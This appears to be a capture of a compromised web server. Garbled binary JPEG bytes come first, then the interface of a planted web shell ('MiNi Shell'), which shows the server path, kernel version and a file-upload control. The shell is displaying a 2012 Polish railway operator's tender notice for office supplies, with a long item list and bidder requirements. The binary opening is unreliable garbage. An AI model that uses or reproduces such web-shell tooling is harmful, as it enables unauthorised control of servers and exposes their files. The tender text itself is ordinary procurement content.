JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120928/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120928/207857-N-2012.html

<p class="kh_header"><b>Wrocław: Dostawa artykułów piśmiennych i biurowych</b><br>
<b>Numer ogłoszenia: 207857 - 2012; data zamieszczenia: 28.09.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> "Przewozy Regionalne" sp. z o.o. Dolnośląski Zakład Przewozów Regionalnych , ul. Małachowskiego 9, 50-084 Wrocław, woj. dolnośląskie, tel. 71 717 14 00, faks 71 717 55 09.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.przewozyregionalne.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: transport kolejowy.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa artykułów piśmiennych i biurowych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> I. Cykliczna dostawa  artykułów piśmiennych i biurowych, transportem i na koszt Wykonawcy do Magazynu Zakładowego   Dolnośląskiego Zakładu Przewozów Regionalnych we Wrocławiu przy ul Pułaskiego 48, tj.:

1. blok z makulatury format: A-4, w kratkę 50 kartkowe - szt. 280
2. blok z makulatury format: A-5, w kratkę 50 kartkowe - szt. 280
3. chusteczki do monitora LCD nasączone- op. 175
4. cienkopis komplety po 6 kolorów, grubość linii: 0,4 mm - kpl. 335
5. cienkopis pojedyńczy, gr.linii 0,4mm, czarny, niebieski - szt. 350
6. długopis typu PENTEL lub równoważne, kolor czarny, niebieski, zielony, czerwony - szt. 2245
7. długopis żelowy, grubość 0,5 mm, kolor czarny, niebieski, zielony, czerwony - szt. 1025
8. długopis typu Zenith lub równoważne, kolor czarny, niebieski, zielony, czerwony - szt. 1580
9. dratwa-szpagat rolka 250g - szt. 145
10. datownik plastikowy, mały  z zapisem liczbowym - szt. 5
11. dziurkacz biurowy o wsadzie jednorazowym do 15 kartek - szt. 65
12. dziurkacz biurowy o wsadzie jednorazowym do 40 kartek - szt. 5
13. dziurkacz biurowy na 4 otwory - szt. 2
14. grzbiet do bindownicy śr. 8 mm op. 100 szt.- op. 6
15. grzbiet do bindownicy śr.10 mm op. 100szt. - op. 6
16. grzbiet do bindownicy śr.12,5 mm op. 100szt. - op. 6
17. grzbiet do bindownicy śr.14 mm op. 100szt. - op. 8
18. grzbiet do bindownicy śr.16 mm op. 100szt. - op. 8
19. grzbiet do bindownicy śr.19 mm op. 100szt. - op. 4
20. grzbiet do bindownicy śr.22 mm op. 50szt. - op. 4
21. grzbiet do bindownicy śr.28 mm op. 50szt. - op. 3
22. grzbiety wsuwane szer. 10mm op. 50 szt. - op. 3
23. gumka do mazania chlebowa, miękka, biała, typu FACTIS lub równoważne - szt. 250
24. kalka ołówkowa format: A-4, fioletowa, op. 100 szt. - op. 90
25. klej biurowy w sztyfcie o pojemności: 36g - szt. 210
26. klej biurowy szkolny, biały w tubie 50 g - szt. 270
27. klej WIKOL op. 100 ml - szt. 10
28. klipsy biurowe	8mm - op. 80
29. klipsy biurowe	19mm - op.	85
30. klipsy biurowe	25mm, - op. 80
31. klipsy biurowe 32mm - op. 90
32. klipsy biurowe	50mm - op.80
33. kołonotatnik format: A-5 w kratkę, 160 kartek - szt. 10
34. koperta samoklejąca format: C-6, listowa, biała SK	 - szt. 8 300
35. koperta format: C-6, brąz lub biała NK, zamykana z węższej strony - szt. 3 200
36. koperta samoklejąca format: C-5, brąz SK - szt. 6 200
37. koperta samoklejąca format: C-5, biała SK - szt. 5 000
38. koperta samoklejąca format: C-4, brąz SK - szt. 13 600
39.koperta samoklejąca format: B-4, brąz 250x235x40, rozszerzane dno - szt.300
40. koperta samoklejąca format: C-3, brąz SK - szt. 3000		
41. korektor w piórze, plastikowa końcówka, poj.7ml - szt. 140
42. korektor w płynie z pędzelkiem, poj. 20ml - op. 150
43. korektor w taśmie szer.5mm, dł.5m - szt. 255
44. koszulki na dokumenty format: A-4, op. 100 szt. - op. 360
45. koszulki na dokumenty format: A-5, op. 100 szt. - op. 140
46. koszulki na dokumenty format: A-4, z klapką z boku, op. 10 szt.  - op. 160
47. kuweta-rynienka na dokumenty	z przydymionego plastiku - szt. 145
48. linijka dł. 20 cm, plastikowa - szt. 55
49. linijka - dł. 30 cm, plastikowa - szt. 70
50. linijka - dł. 50cm, plastikowa - szt. 30
51. marker z okrągłą końcówką, permanentny, wodoodporny, kolor czarny i niebieski - szt. 290
52. marker do tablic suchościeralnych, różne kolory - szt. 20
53. marker olejny, szybkoschnący, kolor biały i czarny - szt. 210
54. marker, pisak do pisania na folii, szkle, płytach C - szt. 20
55. notatnik akademicki w kratkę format: A-4, 96 kartkowy, twarda oprawa - szt. 185
56. notatnik akademicki w kratkę	format: A-4, 192 kartkowy, twarda oprawa - szt. 10
57. notes w formie bloczka o wym.: 80 mm x 80 mm, biały, bl. 500 szt. - bl. 250
58. notes w formie bloczka o wym.: 76 mm x 76 mm, żółty, samoprzylepny, bl. 100 szt. - bl. 1100
59. notes w kratkę format: B-6, twarda oprawa - szt.	120
60. nożyczki 21 cm - szt. 100
61. nożyczki 25,5 cm - szt. 10
62. nożyk do tapet grube ostrze, łamane - szt. 20
63. ofertówka twarda format: A-4, op. 10 szt. L gr. 200? - op. 230
64. ofertówka twarda format: A-5, op. 10 szt. L gr. 200? - op. 160
65. ofertówka twarda wpinana z zawieszką, format A4, op. 10szt. U gr. 150-200? - op. 10
66. okładka do bindownicy format: A-4, kartonowa, kolorowa op. 100 szt. - op. 20
67. okładka do bindownicy format: A-4, przeźroczysta op. 100 szt.- op.	20
68. ołówek szkolny z gumką HB - szt. 390
69. papier komputerowy - składanka szer. 250, 1+0 - op. 4
70. papier komputerowy - składanka szer. 240, 1+0 - op. 8
71. papier komputerowy - składanka szer. 240, 1+1 - op. 120
72. papier komputerowy - składanka szer. 240, 1+2  kolorowe kopie - op. 50
73. papier komputerowy - składanka szer. 210, 1+2  kolorowe kopie - op. 90
74. papier ksero format: A-4, żółty, 80g, ryza 500 szt. typu POLLUX lub równoważne - ryza 10
75. papier ksero format: A-3, żółty, 80g, ryza 500 szt. typu POLLUX lub równoważne - ryza 10
76. papier pakowy w arkuszach, szary z połyskiem - kg 60
77. papier samoprzylepny format: A-4 biały, żółty op. 50szt. matowy - op. 90
78. papier biały format: A-4, tekturka, 160g/m2	 - op.20
79. pinezki biurowe zwykłe metalowe, op. 50 szt. - op. 55
80. pinezki biurowe do tablic korkowych, op. 50 szt. op. 95
81. płyty CD RW op. 5szt. - op. 24
82. podkład na biurko papierowy, 56x44cm, 30 kartkowy - szt. 5
83. podkład na biurko z PCV bezbarwny typu Bantex 49x65 - szt. 6
84. podkładka z klipem format: A-4, twarda tektura oklejona PCV - szt. 50
85. podkładka z klipem format: A-5, twarda tektura oklejona PCV - szt. 50
86. podkładka pod mysz	standardowa - szt. 10
87. pojemnik na dokumenty otwarty 	format: A-4, składany PCV gr.grzbietu 70mm - szt. 50
88. przekładki do segregatora tekturowe, 12 kolorów, format A-4 - op. 90
89. przybornik na biurko	z tworzywa szt. z wyposażeniem 13 elementów - szt.	5
90. pudła archiwalne tektura, wym. 27x10x34cm - szt.465
91. pudła archiwalne tektura, wym. 43x34x31cm - szt. 165
92. pudła archiwalne tektura, wym. 30x33x58,5cm - szt. 220
93. rolka papierowa 69mm x 60 m offsetowa - szt. 5 120
94.rolka papierowa 57mm x 30 m offsetowa - szt. 40
95.rozszywacz do usuwania zszywek z dokumentów - szt. 65
96.segregator z dwustronną, wymienną etykietą na grzbiecie i otworem na palec, oklejone na zewnątrz poliokleiną, format: A-4, szer. grzbietu 50mm, mix kolorów - szt. 220
97.segregator z dwustronną, wymienną etykietą na grzbiecie i otworem na palec, oklejone na zewnątrz poliokleiną, format: A-4, szer. grzbietu 75mm, mix kolorów - szt. 270
98.segregator z dwustronną, wymienną etykietą na grzbiecie i otworem na palec, oklejone na zewnątrz poliokleiną, format: A-5, szer. grzbietu 50mm, mix kolorów - szt. 100
99.segregator z dwustronną, wymienną etykietą na grzbiecie i otworem na palec, oklejone na zewnątrz poliokleiną, format: A-5, szer. grzbietu 75mm, mix kolorów - szt. 110
100.skoroszyt plastikowy format: A-4, bez zawieszki, 1 strona przeźroczysta, op. 10szt., mix kolorów - szt. 1 070
101.skoroszyt plastikowy format: A-4, z zawieszką, 1 strona przeźroczysta, op. 10szt., mix kolorów - szt. 1 820
102.skoroszyt tekturowy format: A-4 - szt. 510
103.skoroszyt tekturowy format: A-4 oczkowy - szt. 140
104.skorowidz format: A-4 - szt. 70
105.skorowidz format: A-5 - szt. 80
106.spinacz biurowy duży 50mm, op. 100 szt. - op. 150
107.spinacz biurowy mały 28mm, op. 100 szt. - op. 340
108.spinka archiwizacyjna PCV do spinania dokumentów, op. 50 szt. - op. 10
109.spray do czyszczenia obudowy komputera	antystatyczna pianka op. 400ml - op. 85
110sprężone powietrze spray 400ml - szt. 10
111.tablica korkowa 80x60 w drewnianej ramie - szt. 10
112.taśma klejąca bezbarwna, 24mm x 20 m - szt. 680
113.taśma klejąca bezbarwna, 48mm x 50 m - szt. 350
114.taśma klejąca szara, z tworzywa sztucznego, 48mm x 45 m - szt. 365
115.taśma klejąca dwustronna, 38mm x 10 m - szt. 160
116.teczka na rzep tekturowa, twarda, format: A-4, gr.grzbietu 3,5cm - szt. 20
117.teczka do podpisu format: A-4, 15 przekładek - szt. 35
118.teczka tekturowa wiązana format: A-4 - szt. 390
119.teczka z gumką format: A-4 kolorowa, tekturowa, lakierowana - szt. 2 080
120.teczka z gumką format: A-4 biała, tekturowa - szt. 825
121.teczka z gumką format: A-4 z 12 przegródkami na dokumenty - szt. 70
122.teczka z rączką tekturowa, twarda, format: A-4, gr.grzbietu 6 cm - szt. 85
123.temperówka metalowa, pojedyncza - szt. 135
124.tusz do pieczątek automatycznych typu NORIS, bezolejowy, op. 25 ml, kolor czarny, niebieski i czerwony, fioletowy - op. 175
125.wkład do długopisu krótki, cienki, typu PENTEL lub równoważne, kolor niebieski, czarny, zielony, czerwony - szt. 530
126.wkład do długopisu żelowy, grubość 0,5 mm, kolor czarny, niebieski, zielony, czerwony - szt. 640
127.wkład do długopisu typu Zenith lub równoważne, kolor czarny, niebieski, czerwony, zielony - szt. 835
128.zakładki indeksujące 4 kolory, papierowe Post-it - kpl. 170
129.zakładki indeksujące 4 kolory, strzałki, lakierowane - kpl. 20
130.zakreślacz szer.linii 0,2 do 0,5mm, różne kolory - szt. 680
131.zeszyt w kratkę format: A-5, 32 kartkowy - szt. 185
132.zeszyt w kratkę format: A-5, 60 kartkowy - szt. 25
133.zeszyt w kratkę format A-5, 80 kartkowy - szt. 20
134.zeszyt w kratkę format: A-5, 96 kartkowy, twarda oprawa - szt. 150
135.zszywacz biurowy zwykły, na zszywki 24/6 - szt. 100
136.zszywacz biurowy duży do 100 kartek na zszywki 23/6 do 23/24 - szt. 3
137.zszywacz biurowy obrotowy - szt. 5
138.zszywacz biurowy mini - szt. 80
139.zszywki mini - op. 155
140.zszywki 24:6 w op. 1000szt. - op. 800
141.zszywki 23:6 w op. 1000szt. - op. 5
142.zszywki 23:8 w op. 1000szt. - op. 5
143.zszywki 23:10 w op. 1000szt. - op. 5
144.zszywki 23:13 w op. 1000szt. - op. 5
II. Oferowane artykuły piśmienne i biurowe mają być fabrycznie nowe i nieregenerowane, wolne od wad, bez śladów uszkodzeń zewnętrznych, pakowane pojedynczo lub w pakietach oraz muszą spełniać powszechnie obowiązujące standardy jakościowe.
III. Czas wymiany uszkodzonych lub wadliwych artykułów nie może być dłuższy niż 5 dni roboczych od dnia otrzymania przez Wykonawcę protokołu reklamacyjnego.
IV. Zamawiający zastrzega sobie, iż z przewidywanego zapotrzebowania zrealizuje bezwarunkowo 80%, zaś pozostałe 20% w zależności od potrzeb.
V. W przypadku dostarczenia wyrobu nie spełniającego wymagań jakościowych określonych w ofercie przetargowej  Wykonawca zobowiązany jest do wymiany przedmiotu umowy na swój koszt w terminie 5 dni roboczych od przekazania faksem przez Zamawiającego protokołu reklamacyjnego. Po tym terminie Zamawiający naliczy kary umowne.
VI. Na każde żądanie Zamawiającego, Wykonawca jest zobowiązany okazać dla dostarczonej partii art. piśmiennych i biurowych odpowiednie certyfikaty zgodności z Polską Normą lub normami równoważnymi. 
VII.Termin dostawy przedmiotu zamówienia należy uzgodnić z 10 dniowym wyprzedzeniem..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 30.19.20.00-1, 30.19.70.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający wymaga przedłożenia w tym zakresie oświadczenia o spełnieniu warunków udziału w postępowaniu z art. 22 ust. 1 Ustawy Prawo Zamówień Publicznych (wg wzorów - Załącznik Nr 2 do SIWZ)</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający wymaga przedłożenia w tym zakresie: 1. oświadczenia o spełnieniu warunków udziału w postępowaniu z art. 22 ust. 1 Ustawy Prawo Zamówień Publicznych (wg wzorów - Załącznik Nr 2 do SIWZ). 2. wykazu wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw w okresie ostatnich trzech lat przed upływem terminu składania ofert,  a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających przedmiotem dostawom stanowiącym przedmiot zamówienia, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców oraz dokumentów potwierdzających, że te dostawy zostały wykonane lub są wykonywane należycie, tj. wykaz zawierający minimum dwie dostawy o wartości minimum 10 000,00 zł brutto każda (zał. nr 3 do SIWZ).</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający wymaga przedłożenia w tym zakresie oświadczenia o spełnieniu warunków udziału w postępowaniu z art. 22 ust. 1 Ustawy Prawo Zamówień Publicznych (wg wzorów - Załącznik Nr 2 do SIWZ).</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający wymaga przedłożenia w tym zakresie oświadczenia o spełnieniu warunków udziału w postępowaniu z art. 22 ust. 1 Ustawy Prawo Zamówień Publicznych (wg wzorów - Załącznik Nr 2 do SIWZ).</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający wymaga przedłożenia w tym zakresie oświadczenia o spełnieniu warunków udziału w postępowaniu z art. 22 ust. 1 Ustawy Prawo Zamówień Publicznych (wg wzorów - Załącznik Nr 2 do SIWZ).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wypełniony Formularz oferty (wg wzoru - Załącznik Nr 1 do SIWZ)</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.przewozyregionalne.pl<br>
